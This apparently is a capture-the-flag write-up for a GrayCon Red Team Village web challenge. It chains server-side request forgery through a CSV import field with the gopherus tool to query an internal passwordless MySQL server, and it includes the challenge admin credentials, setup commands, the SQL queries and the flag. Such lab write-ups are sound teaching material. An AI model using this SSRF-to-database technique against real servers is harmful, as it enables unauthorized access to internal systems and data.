GrayCon CTF - Red Team Village Web Challenge

# GrayCon CTF - Red Team Village Web Challenge ### Name: c0ntr0l 0x03 ### Category: web ### Points: 150 ###### tags: `CTF` `GrayCon` `Red Team Village` `web` `SSRF` > At the time of this write up, the challenges has ended and the web interfaces closed, so I will explain some processes rather than providing screenshots. ### Challenge Description We were told to find out was Angela was talking about and find the flag. ### Solution From the beginning of the series, we got the admin credentials and can login to the admin dashboard as http://104.131.178.50:8888/ > admin:exciting_time_in_the_world_right_now Now we can explore the `Import Shipment` function and try to see how it works. Entering a URL into the field we get the error below: ![](https://i.imgur.com/Gt6L7KN.jpg) The server wants a CSV file that contains the `shipmentID,arrival_date,catalogURL` headers. Going back to our SSRF from earlier, again we set up [ngrok](https://ngrok.com/) and then start a web server on our local system using python3. ``` ./ngrok http 80 python3 -m http.server ``` We created a CSV file to contain the headers and included some values to see how the file is processed. ``` shipmentID,arrival_date,catalogURL 1,2,127.0.0.1/flag.php ``` ![](https://i.imgur.com/VnUYetV.jpg) We got a base64 encoded string response, decoding this decodes to: ``` <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.38 (Debian) Server at 127.0.0.1 Port 80</address> </body></html> ``` Interesting, so we know the server is taking the catalogURL value in the file and trying to request it. Going back to the challenge description, we were asked what Angela was talking about, checking the messages, there is a message from Angela. ![](https://i.imgur.com/D9Bhm3I.jpg) Looking at the message, we have a username `brian` with a mysql database that does not have password. We know SSRF exists, going back to the `Server Configuration`, we see there is a MySQL server at `10.10.10.53` on port `3306`. We then proceeded to combine SSRF with MySQL and the perfect tool was [gopherus](https://github.com/tarunkant/Gopherus). Using gopherus, we can craft a mysql payload to access the mysql server. ``` gopherus --exploit mysql ``` ![](https://i.imgur.com/AIHx2Uf.jpg) Crafting some sql queries as payload, we found the database name, `webnote` and the table `settings`. The final payload was: ![](https://i.imgur.com/PPKdv3n.jpg) ``` use webnote;select * from settings; ``` We got a base64 encoded string response, decoding the response contains the flag. ### Flag > flag{c0ntrolIsAnIllusion}